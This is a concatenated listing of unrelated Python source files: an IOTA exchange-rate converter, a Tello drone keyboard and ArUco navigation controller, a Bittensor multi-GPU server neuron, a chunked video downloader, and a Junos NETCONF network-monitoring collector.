if 'coinmarketcap' in self._apis:
cmc_exrates = cmc(self._currencies, self._cmc_api_key)
if cmc_exrates:
self.__update_exrates(cmc_exrates)
return
# use coingecko as default
cg_exrates = coingecko(self._currencies)
if cg_exrates:
self.__update_exrates(cg_exrates)
return
# schedule new try even if both fail
self._scheduler.enter(self._refresh_rate, 1, self.__refresh)
self._scheduler.run()
def __update_exrates(self, update):
self._ex_rates.update(update)
self._last_updated = datetime.utcnow()
# schedule new refresh run
self._scheduler.enter(self._refresh_rate, 1, self.__refresh)
self._scheduler.run()
def up_to_date(self):
'''
Returns true if the last update was not longer ago than the specified threshold
'''
if self._last_updated:
return datetime.utcnow() < self._last_updated + timedelta(seconds=self._delay_threshold * self._refresh_rate)
return False
def iota_to_fiat(self, amount, currency=None, decimal_digits=2):
'''
Converts an iota amount into the requested currency
'''
if currency is None:
currency = self._currencies[0]
if not self.up_to_date():
warnings.warn('Exchange rates are not up to date. Last updated %s' % self._last_updated)
return round(self._ex_rates[currency] * amount / 1_000_000, decimal_digits)
def fiat_to_iota(self, amount, currency=None):
'''
Converts an amount of the specified currency into iota
'''
if currency is None:
currency = self._currencies[0]
if not self.up_to_date():
warnings.warn('Exchange rates are not up to date. Last updated %s' % self._last_updated)
return int(amount / self._ex_rates[currency] * 1_000_000)
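# --- Hedged usage sketch ------------------------------------------------------
# Based only on the public API above; the import name is an assumption derived
# from the package name. Conversions use 1 Miota = 1_000_000 iota, matching the
# scaling inside iota_to_fiat() and fiat_to_iota().
#
#   from iota_exrate_manager import ExRateManager
#   manager   = ExRateManager(refresh_rate=300, currencies=['usd', 'eur'])
#   price_usd = manager.iota_to_fiat(1_000_000, currency='usd')  # one Miota in USD
#   amount    = manager.fiat_to_iota(10, currency='eur')         # 10 EUR in iota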
|
main.py
|
from djitellopy import Tello
import cv2
import pygame
from pygame.locals import *
import numpy as np
import time
import queue
import threading
from cam_class import Camera
from timeit import default_timer as timer
from video_writer import WriteVideo
# Speed of the drone
S = 60
# Speed for autonomous navigation
S_prog = 15
# Frames per second of the pygame window display
FPS = 25
class FrontEnd(object):
""" Maintains the Tello display and moves it through the keyboard keys.
Press escape key to quit.
The controls are:
- T: Takeoff
- L: Land
- Arrow keys: Forward, backward, left and right.
- A and D: Counter clockwise and clockwise rotations
- W and S: Up and down.
"""
def __init__(self):
# Init pygame
pygame.init()
        # Create pygame window
pygame.display.set_caption("Tello video stream")
self.width = 640
self.height = 480
self.screen = pygame.display.set_mode([self.width, self.height])
# create queue for data communications
self.data_queue=queue.Queue()
# Init Tello object that interacts with the Tello drone
self.tello = Tello(self.data_queue)
# Drone velocities between -100~100
self.for_back_velocity = 0
self.left_right_velocity = 0
self.up_down_velocity = 0
self.yaw_velocity = 0
self.speed = 10
# Variables for drone's states
self.battery = 0
self.angles = [0., 0., 0., 0.]
# Direction queue for navigation
self.dir_queue=queue.Queue()
self.dir_queue.queue.clear()
# Bool variables for setting functions
self.send_rc_control = False
self.calibrate = False
self.getPoints = False
self.resetPoints = False
self.save = False
self.getOrigin = False
# Creating video queue
self.video_queue = queue.Queue()
self.video_queue.queue.clear()
self.END_event = threading.Event()
self.END_event.clear()
self.videoWrite = WriteVideo(self.video_queue, FPS, self.END_event)
# Run video writer in the background
thread_vid = threading.Thread(target=self.videoWrite.writer)
thread_vid.daemon = True
thread_vid.start()
# Data collection event
self.getCoords_event = threading.Event()
self.getCoords_event.clear()
# Navigate between markers
self.navigate_event = threading.Event()
self.navigate_event.clear()
# Camera class
self.cam = Camera(S_prog, self.dir_queue, 'calibration_files/camcalib.npz',
self.getCoords_event, self.navigate_event, self.END_event)
# Create update timer
pygame.time.set_timer(USEREVENT + 1, 50)
def run(self):
if not self.tello.connect():
print("Tello not connected")
return
if not self.tello.set_speed(self.speed):
print("Not set speed to lowest possible")
return
# In case streaming is on. This happens when we quit this program without the escape key.
if not self.tello.streamoff():
print("Could not stop video stream")
return
if not self.tello.streamon():
print("Could not start video stream")
return
frame_read = self.tello.get_frame_read()
directions = np.zeros(4)
should_stop = False
while not should_stop:
img=cv2.resize(frame_read.frame, (960,720))
# Read from drone state queue
if not self.data_queue.empty():
pitch, roll, yaw, tof, bat = self.data_queue.get()
self.data_queue.queue.clear()
self.battery = bat
self.angles_tof = [pitch, roll, yaw, tof]
#print([pitch, roll, yaw, tof])
# Calibrate drone camera
if self.calibrate:
img = self.cam.calibrator(img)
# Detect ArUco markers
img = self.cam.aruco(img, self.getPoints, self.resetPoints, self.angles_tof)
# Reset measurements
if self.resetPoints:
self.resetPoints=False
for event in pygame.event.get():
if event.type == USEREVENT + 1:
self.update(directions)
elif event.type == QUIT:
should_stop = True
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
should_stop = True
else:
self.keydown(event.key)
elif event.type == KEYUP:
self.keyup(event.key)
if frame_read.stopped:
frame_read.stop()
break
# Save image on 'M' press
if self.save:
timestr = time.strftime("%Y%m%d_%H%M%S")
cv2.imwrite("images/"+timestr+".jpg", img)
self.save = False
# Navigation started, points and video capture
if self.getCoords_event.is_set():
self.video_queue.put(np.copy(img))
# Write battery percentage
img = self.cam.writeBattery(img, self.battery)
img=cv2.resize(img, (640,480))
# Resize pyGame window
if (img.shape[1] != self.width) or (img.shape[0] != self.height):
self.width = img.shape[1]
self.height = img.shape[0]
self.screen=pygame.display.set_mode((self.width, self.height))
self.screen.fill([0, 0, 0])
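            # OpenCV delivers BGR frames indexed (row, col); pygame.surfarray
            # expects an RGB array indexed (x, y), so convert the colour order
            # and rotate/flip the frame before blitting.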
frame = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
frame = np.rot90(frame)
frame = np.flipud(frame)
frame = pygame.surfarray.make_surface(frame)
self.screen.blit(frame, (0, 0))
pygame.display.update()
time.sleep(1 / FPS)
        # Always call this before finishing; it deallocates resources.
self.tello.end()
def keydown(self, key):
""" Update velocities based on key pressed
Arguments:
key: pygame key
"""
if key == pygame.K_UP: # set forward velocity
self.for_back_velocity = S
elif key == pygame.K_DOWN: # set backward velocity
self.for_back_velocity = -S
elif key == pygame.K_LEFT: # set left velocity
self.left_right_velocity = -S
elif key == pygame.K_RIGHT: # set right velocity
self.left_right_velocity = S
elif key == pygame.K_w: # set up velocity
self.up_down_velocity = S
elif key == pygame.K_s: # set down velocity
self.up_down_velocity = -S
        elif key == pygame.K_a:  # set yaw counter clockwise velocity
            self.yaw_velocity = -S
        elif key == pygame.K_d:  # set yaw clockwise velocity
            self.yaw_velocity = S
def keyup(self, key):
""" Update velocities based on key released
Arguments:
key: pygame key
"""
if key == pygame.K_UP or key == pygame.K_DOWN: # set zero forward/backward velocity
self.for_back_velocity = 0
elif key == pygame.K_LEFT or key == pygame.K_RIGHT: # set zero left/right velocity
self.left_right_velocity = 0
elif key == pygame.K_w or key == pygame.K_s: # set zero up/down velocity
self.up_down_velocity = 0
elif key == pygame.K_a or key == pygame.K_d: # set zero yaw velocity
self.yaw_velocity = 0
elif key == pygame.K_t: # takeoff
self.tello.takeoff()
self.send_rc_control = True
elif key == pygame.K_l: # land
self.tello.land()
self.send_rc_control = False
elif key == pygame.K_k: # camera calibration
if self.calibrate:
self.calibrate = False
else:
self.calibrate = True
elif key == pygame.K_c: # get aruco marker points
if self.getPoints:
self.getPoints=False
else:
self.getPoints = True
self.resetPoints = True
elif key == pygame.K_m: # save image
self.save = True
elif key == pygame.K_o: # start navigation
if self.navigate_event.is_set():
self.navigate_event.clear()
else:
self.navigate_event.set()
elif key == pygame.K_x: # end video
self.END_event.set()
self.getPoints = False
def update(self, dirs):
""" Update routine. Send velocities to Tello."""
if self.send_rc_control:
if self.navigate_event.is_set() and not self.dir_queue.empty():
# Auto navigation, read directions queue
x, y, z, yaw = self.dir_queue.get()
self.tello.send_rc_control(int(x), int(y), int(z), int(yaw))
else:
# Clear directions queue to avoid storing old data
self.dir_queue.queue.clear()
# Control tello manually
self.tello.send_rc_control(self.left_right_velocity, self.for_back_velocity, self.up_down_velocity,
self.yaw_velocity)
def main():
frontend = FrontEnd()
# run frontend
frontend.run()
if __name__ == '__main__':
main()
|
ddp_run.py
|
#!/bin/python3
# The MIT License (MIT)
# Copyright © 2021 Yuma Rao
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the “Software”), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
""" Advanced server neuron.
Example:
$ python miners/text/multitron_server/main.py
"""
from re import I
import bittensor
import torch
import pandas
import datetime
import traceback
import sys
import os
from loguru import logger; logger = logger.opt(colors=True)
from torch.nn.utils import clip_grad_norm_
from datetime import datetime,timedelta
from threading import Lock
from torch.nn.parallel import DistributedDataParallel as DDP
import torch.distributed as dist
import torch.multiprocessing as mp
import time
from multiprocessing import Process, Manager, Event
import threading
os.environ['TOKENIZERS_PARALLELISM'] = 'false'
torch.autograd.set_detect_anomaly(True)
class DDPPipe():
def __init__( self, config: 'bittensor.config', gp_server, wallet: 'bittensor.wallet', forward_q, events, outputs):
r""" Initializes the neuron with the passed config.
"""
torch.autograd.set_detect_anomaly(True)
self.config = config
self.config.to_defaults()
        self.gp_server = gp_server  # .to(gp_server.device)
self.wallet = wallet
self.world_size = config.neuron.world_size
self.forward_q = forward_q
self.events = events
self.outputs = outputs
def init_process(self, rank):
r""" For each process, anchor them to the process group
            so that they know how to communicate with each other.
Args:
rank (int):
rank (id) of the process.
"""
os.environ['MASTER_ADDR'] = self.config.neuron.address
os.environ['MASTER_PORT'] = self.config.neuron.port
if 'cuda' in self.config.neuron.device:
backend = 'nccl'
else:
backend = 'gloo'
dist.init_process_group(
backend,
rank=rank,
world_size=self.world_size,
)
def init_bit(self, rank = 0):
r""" Init bittensor modules after spawning process.
Args:
rank (int):
rank (id) of the process.
"""
self.device = torch.device( device = f'cuda:{rank}' )
self.gp_server.device = self.device
self.gp_server = self.gp_server.to(self.device)
self.subtensor = bittensor.subtensor ( config = self.config )
self.metagraph = bittensor.metagraph ( config = self.config, subtensor = self.subtensor )
self.metagraph.sync()
self.optimizer = torch.optim.SGD(
[ {'params': self.gp_server.parameters() } ],
lr = self.config.neuron.learning_rate,
momentum = self.config.neuron.momentum,
)
if rank == 0 :
logger.success( self.subtensor )
self.subtensor.register( self.wallet )
bittensor.tokenizer()
def cleanup(self):
r""" Kill the process.
"""
dist.destroy_process_group()
def run_parallel( self, ready = None):
r""" Spawn multiple processes.
"""
self.process_ctx = mp.spawn(self.run,
args=(self.world_size, ready),
nprocs=self.world_size,
join = True
)
def run(self, rank = 0, world_size = 0, ready= None):
self.init_bit(rank)
if self.config.neuron.restart == False:
self.gp_server.load(self.config.neuron.full_path)
self.gp_server = self.gp_server.to(self.device)
nn = self.subtensor.neuron_for_pubkey(self.wallet.hotkey.ss58_address)
uid = nn.uid
# --- last sync block
last_sync_block = self.subtensor.get_current_block()
last_set_block = last_sync_block
last_log_block = last_sync_block
last_log_time = time.time()
# -- Main Training loop --
if ready != None and rank == 0 :
ready.set()
try:
torch.cuda.empty_cache()
while True:
try:
request_id, inputs_x = self.forward_q.get(timeout = self.config.neuron.console_log_time)
if inputs_x != None:
inputs_x = inputs_x.to(self.device)
output = self.gp_server.encode_forward(inputs_x)
output_clone = output.detach().clone().to(device = 'cpu')
self.outputs[request_id] = output_clone
self.events[request_id].set()
del output
del output_clone
del inputs_x
torch.cuda.empty_cache()
except Exception as e:
logger.warning(e)
if 'out of memory' in str(e):
for p in self.gp_server.pre_model.parameters():
if p.grad is not None:
del p.grad
if inputs_x != None:
del inputs_x
torch.cuda.empty_cache()
bittensor.logging.success('cleaned memory', sufix = f'rank: {rank}, {e}')
# log if a certain time period had passed
# checking with time instead of block here to avoid frequent syncing from subtensor in a while loop
if time.time() - last_log_time > self.config.neuron.console_log_time:
last_log_time = time.time()
# ---- syncing metagraph for all rank
current_block = self.subtensor.get_current_block()
if current_block - last_sync_block > self.config.neuron.metagraph_sync:
self.metagraph.sync()
last_sync_block = current_block
# ---- console logging
if rank == 0:
# ---- data
                        data = {
                            'block': current_block,
                            'stake': nn.stake,
                            'rank': nn.rank,
                            'incentive': nn.incentive,
                            'trust': nn.trust,
                            'consensus': nn.consensus,
                            'dividends': nn.dividends,
                            'emission': nn.emission,
                        }
# ---- console logging
bittensor.__console__.print('[green]Current Status:[/green]', data)
except Exception as e:
# --- Unknown error ----
logger.exception('Unknown exception: {} with traceback {}', e, traceback.format_exc())
class Server:
def __init__( self, config: 'bittensor.config', gp_server):
r""" Initializes the neuron with the passed config.
"""
self.config = config
self.wallet = bittensor.wallet( config = config ).create().register()
self.subtensor = bittensor.subtensor ( config = self.config )
logger.success( self.subtensor )
ctx = mp.get_context('spawn')
self.forward_q = ctx.Queue()
self.manager = Manager()
self.events = self.manager.dict()
self.outputs = self.manager.dict()
self.axon = bittensor.axon (
config = self.config,
wallet = self.wallet,
forward_text = self.forward_text,
backward_text = lambda x : None,
blacklist = self.blacklist,
priority = self.priority
)
self.axon_pipe = DDPPipe(config, gp_server, self.wallet, self.forward_q, self.events, self.outputs )
self.timecheck = {}
self.subtensor = bittensor.subtensor ( config = self.config )
self.metagraph = bittensor.metagraph ( config = self.config, subtensor = self.subtensor )
self.futures = {}
self.last_sync_block = None
self.last_set_weight_block = None
    # Define our forward function.
def forward_text ( self, inputs_x):
r""" Forward function that is called when the axon recieves a forward request from other peers
Args:
inputs_x ( :obj:`torch.Tensor`, `required`):
torch inputs to be forward processed.
Returns:
outputs (:obj:`torch.FloatTensor`):
The nucleus's outputs as a torch tensor of shape [batch_size, sequence_len, __network_dim__]
"""
result = None
request_id = id(inputs_x)
        self.events[request_id] = self.manager.Event()
        self.forward_q.put( (request_id, inputs_x) )
if self.events[request_id].wait(12):
result = self.outputs[request_id]
        del self.events[request_id]
        if request_id in self.outputs:
            del self.outputs[request_id]
return result
def priority(self, pubkey:str, request_type:bittensor.proto.RequestType, inputs_x) -> float:
r"""Calculates the priority on requests based on stake and size of input
Args:
pubkey ( str, `required`):
The public key of the caller.
inputs_x ( :obj:`torch.Tensor`, `required`):
torch inputs to be forward processed.
request_type ( bittensor.proto.RequestType, `required`):
the request type ('FORWARD' or 'BACKWARD').
"""
uid = self.metagraph.hotkeys.index(pubkey)
priority = self.metagraph.S[uid].item()/ sys.getsizeof(inputs_x)
return priority
def blacklist(self, pubkey:str, request_type:bittensor.proto.RequestType) -> bool:
r"""Axon security blacklisting, used to blacklist message from low stake members
Args:
pubkey ( str, `required`):
The public key of the caller.
request_type ( bittensor.proto.RequestType, `required`):
the request type ('FORWARD' or 'BACKWARD').
"""
# Check for stake
def stake_check() -> bool:
# If we allow non-registered requests return False = not blacklisted.
is_registered = pubkey in self.metagraph.hotkeys
if not is_registered:
if self.config.neuron.blacklist_allow_non_registered:
return False
else:
return True
# Check stake.
uid = self.metagraph.hotkeys.index(pubkey)
if request_type == bittensor.proto.RequestType.FORWARD:
if self.metagraph.S[uid].item() < self.config.neuron.blacklist.stake.forward:
return True
else:
return False
elif request_type == bittensor.proto.RequestType.BACKWARD:
if self.metagraph.S[uid].item() < self.config.neuron.blacklist.stake.backward:
return True
else:
return False
# Check for time
def time_check():
current_time = datetime.now()
if pubkey in self.timecheck.keys():
prev_time = self.timecheck[pubkey]
if current_time - prev_time >= timedelta(seconds=self.config.neuron.blacklist.time):
self.timecheck[pubkey] = current_time
return False
else:
self.timecheck[pubkey] = current_time
return True
else:
self.timecheck[pubkey] = current_time
return False
# Black list or not
if stake_check() or time_check():
return True
else:
return False
def run(self):
def serve_when_ready(serve_kwargs, pipe_ready):
r""" Start to serve Axon when DDP have started
Args:
serve_kwargs(map):
Arguments for serving axon.
pipe_ready(manager.Event):
                    Event that is set once the DDP processes are ready.
"""
if pipe_ready.wait():
self.axon.start().serve(**serve_kwargs)
return
def sync(keyboard_interupt):
r""" Sync with metagraph and set weight to chain.
Args:
keyboard_interupt(manager.Event):
                    Event that is set when the program is being stopped by a keyboard interrupt.
"""
while not keyboard_interupt.is_set():
current_block = self.subtensor.get_current_block()
                if (self.last_sync_block is None) or (current_block - self.last_sync_block > self.config.neuron.metagraph_sync):
self.last_sync_block = current_block
self.metagraph.sync()
bittensor.logging.success('Metagraph synced', sufix = f'{self.last_sync_block} --> {current_block}')
                if (self.last_set_weight_block is None) or (current_block - self.last_set_weight_block > self.config.neuron.blocks_per_set_weights):
self.last_set_weight_block = current_block
chain_weights = torch.zeros(self.metagraph.n)
                    chain_weights[self.uid] = 1
did_set = self.subtensor.set_weights(
uids=self.metagraph.uids,
weights = chain_weights,
wait_for_inclusion = False,
wallet = self.wallet,
)
if did_set:
logger.success('Successfully set weights on the chain')
else:
logger.error('Failed to set weights on chain. (Timeout)')
time.sleep(self.config.neuron.check_sync_time)
try:
self.wallet.create()
self.subtensor.register( self.wallet )
self.metagraph.sync()
neuron = self.subtensor.neuron_for_pubkey(self.wallet.hotkey.ss58_address)
self.uid = neuron.uid
pipe_ready = self.manager.Event()
keyboard_interupt = self.manager.Event()
axon_start_thread = threading.Thread( target = serve_when_ready, args = ({'subtensor': self.subtensor}, pipe_ready) )
sync_thread = threading.Thread( target = sync, args = (keyboard_interupt, ))
axon_start_thread.start()
sync_thread.start()
self.axon_pipe.run_parallel(ready = pipe_ready)
# Just to keep this run function alive.
while True:
time.sleep(20)
except KeyboardInterrupt:
keyboard_interupt.set()
            logger.success('Keyboard interrupt received')
self.axon.stop()
axon_start_thread.join()
sync_thread.join()
except Exception as e:
# --- Unknown error ----
logger.exception('Unknown exception: {} with traceback {}', e, traceback.format_exc())
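
# A minimal, self-contained sketch (not taken from the file above, and meant
# to be saved and run as its own small script) of the queue/event round trip
# that Server.forward_text and DDPPipe.run use: the axon thread enqueues a
# (request_id, tensor) pair and blocks on a Manager Event until the worker
# process has written its result into the shared outputs dict.  `toy_model`
# is an illustrative stand-in for gp_server.encode_forward.
import torch
import torch.multiprocessing as mp

def toy_model(x):
    return x * 2  # stand-in for the real forward pass

def _worker(forward_q, events, outputs):
    # Consumer side: mirrors the loop inside DDPPipe.run.
    while True:
        request_id, inputs_x = forward_q.get()
        if request_id is None:  # sentinel used to shut the worker down
            break
        outputs[request_id] = toy_model(inputs_x)
        events[request_id].set()

if __name__ == '__main__':
    ctx = mp.get_context('spawn')
    manager = ctx.Manager()
    forward_q, events, outputs = ctx.Queue(), manager.dict(), manager.dict()
    worker = ctx.Process(target=_worker, args=(forward_q, events, outputs))
    worker.start()

    # Producer side: mirrors Server.forward_text.
    inputs_x = torch.ones(2)
    request_id = id(inputs_x)
    events[request_id] = manager.Event()
    forward_q.put((request_id, inputs_x))
    if events[request_id].wait(12):
        print(outputs[request_id])  # tensor([2., 2.])

    forward_q.put((None, None))
    worker.join()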
|
videodown.py
|
# -*- coding: utf-8 -*-
import requests
from contextlib import closing
import time
# import Queue
# import hashlib
# import threading
import os
from fake_useragent import UserAgent
# import fake_useragent
def download_file(url, path):
# with closing(requests.get(url, stream=True)) as r:
ua = UserAgent()
headers = {'user-agent':ua.random}
print(headers)
# headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
r = requests.get(url, stream=True, headers = headers)
chunk_size = 1024 * 10
content_size = int(r.headers['content-length'])
# name = r.headers['content-disposition']
if os.path.exists(path) and os.path.getsize(path) >= content_size:
print("已下载")
return
print("开始下载")
with open(path, "wb") as f:
p = ProgressData(size=content_size, unit='Kb', block=chunk_size, file_name=path)
for chunk in r.iter_content(chunk_size=chunk_size):
f.write(chunk)
p.output()
class ProgressData(object):
    def __init__(self, block, size, unit, file_name=''):
self.file_name = file_name
self.block = block/1000.0
self.size = size/1000.0
self.unit = unit
self.count = 0
self.start = time.time()
def output(self):
self.end = time.time()
self.count += 1
speed = self.block/(self.end-self.start) if (self.end-self.start)>0 else 0
self.start = time.time()
loaded = self.count*self.block
progress = round(loaded/self.size, 4)
if loaded >= self.size:
            print(u'%s download complete\r\n' % self.file_name)
else:
            print(u'{0} download progress {1:.2f}{2}/{3:.2f}{4} {5:.2%} download speed {6:.2f}{7}/s'. \
                format(self.file_name, loaded, self.unit, \
                    self.size, self.unit, progress, speed, self.unit))
print('%50s'%('/'*int((1-progress)*50)))
# queue = Queue.Queue()
# def run():
# while True:
# url = queue.get(timeout=100)
# if url is None:
#             print(u'All downloads finished')
# break
# h = hashlib.md5()
# h.update(url)
# name = h.hexdigest()
# path = 'e:/download/' + name + '.mp4'
# download_file(url, path)
#
#
# def get_url():
# queue.put(None)
# if __name__ == '__main__':
# get_url()
# for i in xrange(4):
# t = threading.Thread(target=run)
# t.daemon = True
# t.start()
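
# Minimal self-contained sketch of how ProgressData reports progress; the
# file name and byte counts are made up and simulate a 100 KB download
# fetched in ten 10 KB chunks, mirroring what download_file does per chunk.
if __name__ == '__main__':
    demo = ProgressData(size=100 * 1024, unit='Kb', block=10 * 1024, file_name='demo.bin')
    for _ in range(10):
        time.sleep(0.05)  # stand-in for the time spent receiving one chunk
        demo.output()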
|
junos_collector.py
|
import json
import logging
import logging.config
import threading
import time
import uuid
from copy import deepcopy
from datetime import datetime
from multiprocessing import JoinableQueue
import requests
import yaml
from jnpr.junos import Device
from jnpr.junos.exception import ConnectError, RpcError
# Constants
DATABASE_URL = 'http://0.0.0.0'
DATABASE_PORT = 5000
COLLECTION_INTERVAL = 60 # seconds
# Logging
logger = logging.getLogger(__name__)
class Message(object):
def __init__(self, endpoint, msg, headers):
self.endpoint = endpoint
self.event_msg = msg
self.headers = headers
def send_message(self):
requests.post(self.endpoint, json=self.event_msg, headers=self.headers)
logger.info('%s - %s - %s', self.event_msg['uuid'], self.event_msg['time'], self.event_msg['name'])
class JunosCollector(object):
def __init__(self, config_path):
"""Collector module for Junos RPC information, statistics and status
:param config_path: Location of the credentials for each network device
:type config_path: str
"""
self.connected_devices = {}
self.network_devices = {}
self.broken_devices = {}
self.db_event_endpoint = '{}:{}/create_event'.format(DATABASE_URL, DATABASE_PORT)
self.requests_queue = JoinableQueue(maxsize=0)
self._import_network_devices(config_path)
self.start_monitoring()
def empty_requests(self):
"""Checks for any outgoing events destined for the database and sends them"""
while True:
request = self.requests_queue.get()
request.send_message()
#self.requests_queue.task_done()
def start_monitoring(self):
"""Monitoring loop which collects information from each device
for a specified interval
"""
t_queue = threading.Thread(target=self.empty_requests)
t_queue.start()
while True:
threads = []
start_time = time.time()
self.check_broken_device()
t = threading.Thread(target=self.t_interface_statuses)
threads.append(t)
t = threading.Thread(target=self.t_bgp_peers)
threads.append(t)
t = threading.Thread(target=self.t_ldp_sessions)
threads.append(t)
t = threading.Thread(target=self.t_ospf_neighbors)
threads.append(t)
t = threading.Thread(target=self.t_pcep_statuses)
threads.append(t)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
end_time = time.time()
duration = end_time - start_time
sleep_duration = COLLECTION_INTERVAL - int(duration)
if sleep_duration < 0:
sleep_duration = 0
time.sleep(sleep_duration)
t_queue.join()
def t_interface_statuses(self):
# Interface Status
device_interface_statuses = self.get_interface_status()
self.monitor_oper_status(device_interface_statuses)
self.monitor_admin_status(device_interface_statuses)
def t_bgp_peers(self):
# BGP Peers
bgp_down_count = self.get_bgp_peers()
self.monitor_bgp_peers(bgp_down_count)
def t_ldp_sessions(self):
# LDP Neighbors
ldp_neighbors = self.get_ldp_session()
self.monitor_ldp_session(ldp_neighbors)
def t_ospf_neighbors(self):
# OSPF Neighbors
ospf_neighbors = self.get_ospf_neighbors()
self.monitor_ospf_neighbors(ospf_neighbors)
ospf_interfaces = self.get_ospf_interfaces()
self.monitor_ospf_interfaces(ospf_interfaces)
def t_pcep_statuses(self):
# PCEP Status
pcep_statuses = self.get_pcep_statuses()
self.monitor_pcep_statuses(pcep_statuses)
def add_event_to_db(self, event_msg):
"""Sends collected information as events to the Database endpoint
:param event_msg: Event message that is compatible with the Database schema
:type event_msg: dict
"""
headers = {
'Content-Type': 'application/json',
}
requests.post(self.db_event_endpoint, json=event_msg, headers=headers)
# self.requests_queue.put(Message(self.db_event_endpoint, event_msg, headers))
def _import_network_devices(self, network_device_file):
"""Import the hostnames, username and password for each network device
and connect to the device
:param network_device_file: Location of the credentials for each network device
:type network_device_file: str
"""
logger.debug('Loading network devices into JunosCollector')
with open(network_device_file, 'r') as f:
            import_devices = yaml.safe_load(f.read())
for device in import_devices['devices']:
self.network_devices[device['name']] = device
logger.debug('Imported credentials for %s', device['name'])
for _, device in self.network_devices.items():
self._connect_to_device(device)
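        # The layout expected of the credentials file, inferred from the loop
        # above; the hostnames and values below are placeholders only:
        #
        #   devices:
        #     - name: P1
        #       ip: 192.0.2.1
        #       user: admin
        #       password: secret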
def _connect_to_device(self, device):
"""Connects to the network device via Netconf
:param device: Contains the necessary information to connect to the device
:type device: dict
:raises ConnectError: When a connection can not be establish to the device
"""
try:
logger.debug('Connecting to %s', device['ip'])
dev = Device(host=device['ip'], user=device['user'], password=device['password'], attempts=1, timeout=1)
dev.open()
logger.info('Successfully connected to %s', device['ip'])
except (ConnectError, RpcError) as e:
logger.error('%s', str(e))
self.broken_devices[device['name']] = dev
else:
self.connected_devices[device['name']] = dev
def _create_event(self, name, type, priority, body):
"""Serialises an Event object that conforms with the Event Database schema
:param name: Name of the Event
:type name: str
        :param type: Type of Event (eg. CLI/APPFORMIX)
:type type: str
:param priority: Priority of the Event (eg. INFORMATION/WARNING/CRITICAL)
:type priority: str
:param body: Any other extra information related to the Event
:type body: dict
:return: An Event Database compatible object
:rtype: dict
"""
event = {
'uuid': str(uuid.uuid4()),
'time': str(datetime.now().isoformat()),
'name': name,
'type': type,
'priority': priority,
'body': json.dumps(body),
}
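        # Illustrative example of the resulting dict (values are made up):
        #   {'uuid': 'e6e0...', 'time': '2021-01-01T00:00:00', 'name': 'bgp.peers.up.P1',
        #    'type': 'cli', 'priority': 'information', 'body': '{"P1": {...}}'}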
return event
def check_broken_device(self):
        for dev_name, dev in list(self.broken_devices.items()):
try:
dev.open()
dev = self.broken_devices.pop(dev_name)
self.connected_devices[dev_name] = dev
self.send_connection_error(True, dev_name, 'Reconnected to device {}'.format(dev_name))
except Exception as e:
logger.error(e)
self.send_connection_error(False, dev_name, e)
def send_connection_error(self, status, device_name, msg):
if status is True:
event = self._create_event(name='connection.up.{}'.format(device_name),
type='connection',
priority='information',
body={'Information': str(msg)})
self.add_event_to_db(event)
else:
event = self._create_event(name='connection.down.{}'.format(device_name),
type='connection',
priority='critical',
body={'error': str(msg)})
self.add_event_to_db(event)
def get_interface_status(self):
device_interface_statuses = {}
rpc_replies = {}
to_monitor = ['ge-0/0/0', 'ge-0/0/1', 'ge-0/0/2', 'ge-0/0/0.0', 'ge-0/0/1.0', 'ge-0/0/2.0']
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
try:
rpc_reply = connected_dev.rpc.get_interface_information(terse=True)
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
device_interface_statuses[dev_name] = []
interface_status = {}
logical_interfaces = rpc_reply.xpath('//physical-interface|//logical-interface')
for logical_interface in logical_interfaces:
name = logical_interface.xpath('.//name')[0].text.replace('\n', '')
if name not in to_monitor:
continue
admin_status = logical_interface.xpath('.//admin-status')[0].text.replace('\n', '')
oper_status = logical_interface.xpath('.//oper-status')[0].text.replace('\n', '')
interface_status[name] = {
'admin-status': admin_status,
'oper-status': oper_status,
}
device_interface_statuses[dev_name] = interface_status
return device_interface_statuses
def get_bgp_peers(self):
device_bgp_peer_count = {}
rpc_replies = {}
to_monitor = ['P1', 'P2', 'P3']
for dev_name, connected_dev in self.connected_devices.items():
if connected_dev is None:
continue
if dev_name not in to_monitor:
continue
try:
rpc_reply = connected_dev.rpc.get_bgp_summary_information()
except (ConnectError, RpcError) as e:
self.safely_set_device_broken(dev_name)
else:
rpc_replies[dev_name] = rpc_reply
for dev_name, rpc_reply in rpc_replies.items():
device_bgp_peer_count[dev_name] = {}
device_bgp_peer_count[dev_name]['peer-count'] = 0
device_bgp_peer_count[dev_name]['down-peer-count'] = 0
try:
peer_count_xpath = rpc_reply.xpath('//bgp-information/peer-count')
down_peer_count_xpath = rpc_reply.xpath('//bgp-information/down-peer-count')
if peer_count_xpath:
device_bgp_peer_count[dev_name]['peer-count'] = int(peer_count_xpath[0].text)
                if down_peer_count_xpath:
device_bgp_peer_count[dev_name]['down-peer-count'] = int(down_peer_count_xpath[0].text)
except Exception as e:
logger.error(e)
return device_bgp_peer_count
def safely_set_device_broken(self, dev_name):
"""Removes the device from the list of connected devices
and places it into the broken device list.
This also handles the conflict of the devices already being removed
during multithreading.
:param dev_name: Name of the device
:type dev_name: str
"""
try:
dev = self.connected_devices.pop(dev_name)
self.broken_devices[dev_name] = dev
except KeyError:
# Probably already removed in another thread
pass
def get_ldp_session(self):
ldp_neighbors = {}
rpc_replies = {}
